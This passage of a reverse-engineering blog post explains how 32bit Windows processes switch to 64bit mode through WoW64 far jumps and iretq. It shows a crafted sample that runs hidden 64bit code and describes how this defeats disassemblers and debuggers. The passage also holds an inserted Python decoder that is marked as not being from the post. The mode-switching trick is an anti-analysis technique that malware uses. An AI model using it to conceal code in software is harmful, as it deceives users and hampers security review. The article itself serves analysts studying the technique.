<span style="font-family: Courier New, Courier, monospace;">00000000`74c62320 ea1e27c6743300 jmp 0033:74C6271E</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">A far jump? You don't really see this type of jump very often in 32bit, so why is it used here? Because it is switching to 64bit mode (the normal usermode code segment for 32bit is </span><span style="font-family: Courier New, Courier, monospace;">0x0023</span><span style="font-family: Verdana, sans-serif;">, and this jump is going to segment </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;">)! In fact, segment </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;"> has some specific properties, let's have a look:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> dg 33</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> P Si Gr Pr Lo</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Sel Base Limit Type l ze an es ng Flags</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">---- ----------------- ----------------- ---------- - -- -- -- -- --------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033 00000000`00000000 00000000`00000000 <b>Code</b> <b>RE</b> Ac <b>3</b> Nb By P <b>Lo</b> 000002fb</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is a code segment with Read/Execute attributes, usermode privilege (ring 3), and the Long bit is set (that is, the segment is for 64bit mode). So now we know how to switch from 32bit to 64bit, but what about the opposite? Since we are executing a 32bit process, it must be possible to switch back to 32bit from 64bit. If we keep debugging, we will pass through the following APIs:</span></div>
</div>
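<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added check (this is not code from the post), the two artifacts of the switch shown above can be decoded offline: the far jmp bytes of wow64cpu!X86SwitchTo64BitMode split into selector and offset, and the Flags value from dg 33 into the descriptor bits that dg prints as "Code RE Ac 3 Nb By P Lo". The flags value 0xCFB used for the 32bit code selector 0023 is a comparison value supplied here (the usual x64 Windows GDT entry), not something from the post, and describe_mode generalises the post's single case to the compatibility-mode code segments as well.</span></div>

```python
"""Added example (not code from the post): decode the far jmp of
wow64cpu!X86SwitchTo64BitMode into selector:offset, and the Flags column of
WinDbg's `dg` into the descriptor bits it prints as "Code RE Ac 3 Nb By P Lo"."""
import struct


def decode_far_jmp(code):
    """Decode `jmp ptr16:32` (opcode EA): a 4-byte offset followed by a
    2-byte selector.  Returns (selector, offset)."""
    if len(code) < 7 or code[0] != 0xEA:
        raise ValueError("not a 7-byte far jmp ptr16:32")
    offset, selector = struct.unpack_from("<IH", code, 1)
    return selector, offset


def split_selector(selector):
    """Descriptor index, table indicator and requested privilege level."""
    return {"index": selector >> 3,
            "table": "LDT" if selector & 4 else "GDT",
            "rpl": selector & 3}


def decode_dg_flags(flags):
    """Decode dg's Flags value: bits 0-7 are the descriptor's access byte
    (P, DPL, S, Type), bits 8-11 its AVL/L/D-B/G nibble."""
    access, nibble = flags & 0xFF, (flags >> 8) & 0xF
    if not access & 0x10:
        raise ValueError("system descriptor (S=0), not a code/data segment")
    is_code = bool(access & 0x08)
    desc = {
        "present": bool(access & 0x80),            # "P" / "NP"
        "dpl": (access >> 5) & 3,                  # the "Pl" column
        "type": "Code" if is_code else "Data",
        "accessed": bool(access & 0x01),           # "Ac"
        "long": bool(nibble & 0x2),                # L bit: "Lo" / "Nl"
        "big": bool(nibble & 0x4),                 # D/B bit: "Bg" / "Nb"
        "page_granular": bool(nibble & 0x8),       # G bit: "Pg" / "By"
    }
    if is_code:
        desc["readable"] = bool(access & 0x02)     # dg prints "RE" for readable code
        desc["conforming"] = bool(access & 0x04)
    else:
        desc["writable"] = bool(access & 0x02)
        desc["expand_down"] = bool(access & 0x04)
    return desc


def describe_mode(flags):
    """CPU mode in which code reached through this selector executes; this
    generalises the post's single case (0033) to the other code segments."""
    d = decode_dg_flags(flags)
    if not (d["present"] and d["type"] == "Code"):
        return "not an executable segment"
    if d["long"] and d["big"]:
        return "invalid (L=1 with D=1 is reserved)"
    if d["long"]:
        return "64-bit mode"
    return "32-bit compatibility mode" if d["big"] else "16-bit compatibility mode"


# Bytes of wow64cpu!X86SwitchTo64BitMode exactly as shown in the post.
X86_SWITCH_TO_64BIT = bytes.fromhex("ea 1e 27 c6 74 33 00")
# Flags column of `dg 33` from the post, and a comparison value for the 32-bit
# code selector 0023 (the usual x64 Windows GDT entry; not from the post).
FLAGS_0033 = 0x2FB
FLAGS_0023 = 0xCFB

if __name__ == "__main__":
    sel, off = decode_far_jmp(X86_SWITCH_TO_64BIT)
    print(f"jmp {sel:04X}:{off:08X}", split_selector(sel))
    for name, flags in (("0033", FLAGS_0033), ("0023", FLAGS_0023)):
        print(name, describe_mode(flags), decode_dg_flags(flags))
```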
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!CpupReturnFromSimulatedCode</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!TurboDispatchJumpAddressStart</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64!Wow64SystemServiceEx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64!whNtCreateFile</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">and finally land on:</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ntdll!NtCreateFile</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121860 4c8bd1 mov r10,rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121863 b852000000 mov eax,52h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121868 0f05 syscall</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`7712186a c3 ret</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The system call itself happens in 64bit mode: a <i>syscall</i> instruction is not accepted from 32bit (compatibility) mode, where Intel defines it as an invalid opcode that raises an exception (AMD processors do accept it there, but WoW64 never issues it from 32bit code). This is an interesting detail, because it tells us that all the APIs that require a transition to kernelmode must switch to 64bit first. (Hint: if you can control the switch to 64bit you can implement a cheap API logger ;))</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">We finish debugging this API and we get to what we were looking for:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626b0 4489442410 mov dword ptr [rsp+10h],r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626b5 458b85c8000000 mov r8d,dword ptr [r13+0C8h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626bc 4c89442418 mov qword ptr [rsp+18h],r8</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626c1 458b85bc000000 mov r8d,dword ptr [r13+0BCh]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626c8 4c890424 mov qword ptr [rsp],r8 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626cc 48cf iretq</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The <i>iretq</i> instruction is similar to a <i>ret</i>: it pops the return address from the top of the stack, but it also pops, in this order, the values used to reload CS, RFLAGS, RSP and SS. We have come full circle:</span></div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnDeSNYdt5kw9mBjI_FfCq5kIE9Fg1dHKl9PLx4tgGMjBrDuPYPVGS1ii-oJakhytNWQufTywpIZUB1-HMaPq2Uf5oYY1_4o6Y0V5Tm2q_F1q6Joke9cYLVlri_MqYYCpBZM9Y1XXr_bU/s1600/jmpred.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnDeSNYdt5kw9mBjI_FfCq5kIE9Fg1dHKl9PLx4tgGMjBrDuPYPVGS1ii-oJakhytNWQufTywpIZUB1-HMaPq2Uf5oYY1_4o6Y0V5Tm2q_F1q6Joke9cYLVlri_MqYYCpBZM9Y1XXr_bU/s1600/jmpred.png" /></a></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">And this is all we need to know about the mode switches.</span></div>
</div>
<div>
<br /></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.2 - Abusing 32bit/64bit switches</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If Windows library code can simply jump back and forth between 32bit and 64bit mode, then why can't we? In fact, we can. As an example I have crafted a 32bit executable that jumps to 64bit mode and then jumps back to 32bit. Here it is:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 _main proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 call ds:DebugBreak</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401019h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 _main endp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401019 db 48h ; sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101A db 83h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101B db 0ECh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101C db 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D db 89h ; mov dword ptr [rsp], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101E db 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101F db 24h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020 db 48h ; mov rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401021 db 8Bh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401022 db 0C4h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401023 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401025 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401026 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401027 db 90h ; nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401028 db 5Bh ; pop rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029 db 48h ; mov rax, 2Bh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102A db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102B db 2Bh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102C db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102D db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102E db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040102F db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401030 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401031 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401032 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401033 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401034 db 53h ; push rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401035 db 48h ; mov rax, 246h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401036 db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401037 db 46h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401038 db 2</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401039 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103A db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103B db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103C db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103D db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103E db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103F db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401040 db 48h ; mov rax, 23h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401041 db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401042 db 23h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401043 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401044 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401045 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401046 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401047 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401048 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401049 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104A db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104B db 48h ; mov rax, 401080h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104C db 0B8h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104D db 80h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104E db 10h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104F db 40h </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401051 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401052 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401053 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401054 db 0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055 db 50h ; push rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401056 db 48h ; iretq</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401057 db 0CFh </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 pop eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I compiled a simple C program whose main() calls </span><span style="font-family: Courier New, Courier, monospace;">DebugBreak</span><span style="font-family: Verdana, sans-serif;"> to conveniently break into the remote debugger, followed by a series of nops that I later overwrote with the opcodes I needed. You can clearly see the far jump at </span><span style="font-family: Courier New, Courier, monospace;">0x00401010</span><span style="font-family: Verdana, sans-serif;">: it jumps to the segment selector </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;"> and to the virtual address </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;">. The code at </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;"> is to be read as 64bit instructions, but since the executable is loaded in IDA as a 32bit PE, </span><span style="font-family: Verdana, sans-serif;">you see it as raw bytes rather than as 64bit instructions.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have put comments on lines </span><span style="font-family: Courier New, Courier, monospace;">0x00401019</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">0x0040101d</span><span style="font-family: Verdana, sans-serif;"> etc. to indicate the 64bit instructions</span><span style="font-family: Verdana, sans-serif;">: after saving eax on the stack, they simply push the values that the final </span><span style="font-family: Courier New, Courier, monospace;">iretq</span><span style="font-family: Verdana, sans-serif;"> needs in order to switch back to 32bit mode. In order, the following values are pushed:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the stack segment selector (</span><span style="font-family: Courier New, Courier, monospace;">0x002B</span><span style="font-family: Verdana, sans-serif;">, the usermode data/stack selector)</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the stack pointer (taken from rbx, which holds the rsp pointing at the saved copy of eax)</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the eflags register (hard-coded here to </span><span style="font-family: Courier New, Courier, monospace;">0x246</span><span style="font-family: Verdana, sans-serif;">)</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the code segment selector (</span><span style="font-family: Courier New, Courier, monospace;">0x0023</span><span style="font-family: Verdana, sans-serif;"> is the standard 32bit usermode code segment)</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the instruction pointer (in this case, it is </span><span style="font-family: Courier New, Courier, monospace;">0x00401080</span><span style="font-family: Verdana, sans-serif;">)</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The iretq will reload all these values, resuming execution in 32bit mode at </span><span style="font-family: Courier New, Courier, monospace;">0x0023:0x00401080</span><span style="font-family: Verdana, sans-serif;">, where the first instruction is the </span><span style="font-family: Courier New, Courier, monospace;">pop eax</span><span style="font-family: Verdana, sans-serif;"> that restores the value saved at the beginning of the 64bit snippet. Bear in mind that the 64bit code also changes the register state seen by the 32bit code (here rax and rbx are clobbered), so it's up to you to preserve the registers that must survive across switches.</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.3 - Some issues with the disassemblers</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Of course you can always open the PE file as a plain binary file in IDA64 and then manually disassemble those bytes as 64bit code, but there are some issues:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">The file is opened as a binary file, which means that if an opcode is referencing a memory location IDA will not show you the x-refs. For instance, if you have "</span><span style="font-family: Courier New, Courier, monospace;">mov rax, 0x00402000"</span><span style="font-family: Verdana, sans-serif;">, since the file is loaded as a binary file and not as a PE, there will not be a reference to the virtual address </span><span style="font-family: Courier New, Courier, monospace;">0x00402000</span><span style="font-family: Verdana, sans-serif;">.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">IDA will not know where the 64bit code snippets are in the file, so you will need to manually get every virtual address from the 32bit PE, translate it to a file offset and then find it in the 64bit binary file loaded in IDA. Annoying!</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">If you have a complex computation (for example, a decryption routine) that interleaves 32bit and 64bit instructions to perform a task, then following the whole routine through static analysis is really a pain: you need to use two sessions of IDA to understand all the code.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To work around these problems, IDA actually lets you interleave 32bit and 64bit code: you can load the 32bit PE file in IDA64, then locate the 64bit snippet and create a 64bit (use64) segment spanning its starting and ending addresses. This way you can browse the 32bit PE file and have 64bit instructions disassembled where needed. The drawback is that you have to create a segment by hand every time you find a 64bit code snippet, which is rather annoying. The result looks like this:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 _main<span class="Apple-tab-span" style="white-space: pre;"> </span> proc near</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401000<span class="Apple-tab-span" style="white-space: pre;"> </span> call ds:DebugBreak</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401006<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401007<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401008<span class="Apple-tab-span" style="white-space: pre;"> </span> mov edx, 12345678h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100D<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100E<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040100F<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401010<span class="Apple-tab-span" style="white-space: pre;"> </span> jmp far ptr 33h:<b><u>401020h</u></b></span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 _main<span class="Apple-tab-span" style="white-space: pre;"> </span> endp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040101F _text<span class="Apple-tab-span" style="white-space: pre;"> </span> ends</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020 ; ===========================================================================</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:<b><u>0000000000401020</u> </b>; Segment type: Regular</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020 TEST1<span class="Apple-tab-span" style="white-space: pre;"> </span> segment byte public '' use64</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> assume cs:TEST1</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> ;org 401020h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> assume es:nothing, ss:nothing, ds:nothing</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401020<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, rsp</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401023<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401024<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401025<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401026<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401027<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401028<span class="Apple-tab-span" style="white-space: pre;"> </span> pop rbx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401029<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 2Bh</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401033<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401034<span class="Apple-tab-span" style="white-space: pre;"> </span> push rbx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401035<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 246h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040103F<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401040<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, 23h</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040104A<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040104B<span class="Apple-tab-span" style="white-space: pre;"> </span> mov rax, <b><u>401080h</u></b></span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401055<span class="Apple-tab-span" style="white-space: pre;"> </span> push rax</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401056<span class="Apple-tab-span" style="white-space: pre;"> </span> add rdx, rdx</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401059<span class="Apple-tab-span" style="white-space: pre;"> </span> iretq</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:0000000000401059 ; ---------------------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">TEST1:000000000040107F TEST1<span class="Apple-tab-span" style="white-space: pre;"> </span> ends</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 ; ===========================================================================</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:<b><u>00401080</u> </b>; Segment type: Pure code</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 ; Segment permissions: Read/Execute</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080 _text<span class="Apple-tab-span" style="white-space: pre;"> </span> segment para public 'CODE' use32</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> assume cs:_text</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> ;org 401080h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> assume es:TEST1,<span class="Apple-tab-span" style="white-space: pre;"> </span>ss:TEST1, ds:_data</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401081<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D4<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D5<span class="Apple-tab-span" style="white-space: pre;"> </span> nop</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D6<span class="Apple-tab-span" style="white-space: pre;"> </span> xor eax, eax</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D8<span class="Apple-tab-span" style="white-space: pre;"> </span> retn</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Notice that there are no cross references for memory locations between the two segments (for instance from the <i>mov rax, 401080h</i> to <i>.text:00401080</i>); even applying the "offset" command manually won't create them.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">These issues show up mainly in static analysis; if you are debugging the code you can just follow it, and the obfuscation won't matter. Or will it? Well, it turns out that debuggers do not handle this kind of 64bit code inside a 32bit process very well (see section 3), and besides, it is common to analyse parts of an executable without being able to run them, so this is a serious issue. </span></div>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">3 - Debuggers</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">Let's have a quick overview of the debugging problems.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Verdana, sans-serif;">3.1 - Which one works?</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have tested some common debuggers and, as I briefly mentioned in section 2.3, the results are poor:</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Ollydbg</u> - It can debug a 32bit process, but it won't be able to trace the far jumps. If you try to step over/into one of those jumps, the debugger will lose control, and will end up somewhere else in the code.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Syser Win32 Debugger</u><b> </b>- Same as Ollydbg.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Syser kernel debugger</u><b> </b>- It doesn't run on 64bit Windows.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Windbg local debugger</u> - Same as Ollydbg.</span></li>
